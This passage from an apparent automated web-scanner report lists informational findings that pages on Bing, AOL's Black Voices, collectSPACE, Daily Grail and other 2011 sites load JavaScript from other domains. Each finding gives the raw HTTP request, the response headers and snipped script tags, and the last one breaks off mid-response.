Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 73050
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:38 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.172 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:38 GMT
Connection: close
Set-Cookie: _SS=SID=B71C8D628B0F4062BAF75BDD9CE07BCA; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:38 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7159d46559974b7eafd96922676f898f; expires=Mon, 28-Jan-2013 23:52:38 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:38 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.427. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:40 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:40 GMT
Connection: close
Set-Cookie: _SS=SID=2E376A0BF5834E45B98F75D90803364C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf02d2bc303694c3ba9934d227af68c96; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.428. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 74654
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.172 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:34 GMT
Connection: close
Set-Cookie: _SS=SID=BCB98114028D4A5E81EF691306272468; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccd6fb92b12e34795ba142d92e75f5673; expires=Tue, 29-Jan-2013 17:00:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:34 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.429. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=225
Content-Length: 77586
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:05:41 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:55 GMT
Connection: close
Set-Cookie: _SS=SID=A04847CB1C4A4F00ADBD32C3561048B5; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:55 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cc7f5dcb1528646278493d65923bfb811; expires=Tue, 29-Jan-2013 17:01:55 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:55 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.430. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68975
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:25 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:25 GMT
Connection: close
Set-Cookie: _SS=SID=A982272C07BD4E90B5DE76723277906D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2c1f9480a1dd4b8883876429b35f6f0c; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.431. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/where-it-all-began/17wv375x2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68842
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:34 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:34 GMT
Connection: close
Set-Cookie: _SS=SID=0A2FC48D77544E149B050D7F74A8325B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c281ac093fd6548bda49e28e4474b2b6f; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.432. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 74503
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:28 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:28 GMT
Connection: close
Set-Cookie: _SS=SID=1C20FB52E6FA4423ADB90121688D5B2C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5ccc44826f8244ed9ff22ec7485c1ee5; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

23.433. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.404292352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:17 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31057
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</title>


<script language="javascript" type="text/javascript" src="http://o.aolcdn.com/journals_js/journals_blog_this.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
p://o.aolcdn.com/art/merge/?f=/_media/channels/common.css&f=/_media/channels/us.bv/bv.css&f=/_media/ch_css/bv_redesign-r18g.css&f=/_media/ch_bv/bv_comments.css&ver=1b&expsec=31536000&expsec=864000" />
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000"></script>
...[SNIP]...
<!-- Standard Feed Subscribe Widget Include -->
<script src="http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>


<script src="http://cdn.channel.aol.com/_media/channels/ad_refresher.js" type="text/javascript" language="javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="text">
<script type="text/javascript" src="http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js"> </script>
...[SNIP]...

23.434. http://www.bundle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bundle.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bundle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app02
X-Bundle-Server: prod-web01
Date: Sat, 29 Jan 2011 23:53:32 GMT
Content-Length: 9134
Connection: close
Cache-Control: private
Expires: Sat, 29 Jan 2011 23:48:42 GMT
Expires: Sat, 29 Jan 2011 23:48:42 GMT
Expires: Sat, 29 Jan 2011 23:48:42 GMT
Expires: Sat, 29 Jan 2011 23:48:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</div>

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=jayk&apiKey=R_f1ac808d96b3430478cc0b7453905b5b"></script>
<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/msAnalytics.js"></script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.435. http://www.collectspace.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collectspace.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.collectspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 03:05:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/
Last-Modified: Sat, 29 Jan 2011 15:33:04 GMT
Content-Length: 35661

<HTML>
<HEAD>
<META NAME="description" CONTENT="Source for space history, space artifacts, and space memorabilia. Learn where astronauts will appear, browse collecting guides, and read original space
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</table>

<script defer src="http://server1.opentracker.net/?site=www.collectspace.com"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

23.436. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dabagirls.com
Path:   /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dabagirls.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 01:52:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">

<head
...[SNIP]...
</div><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

23.437. http://www.dailygrail.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</p>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.438. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.davidpoll.com/xmlrpc.php
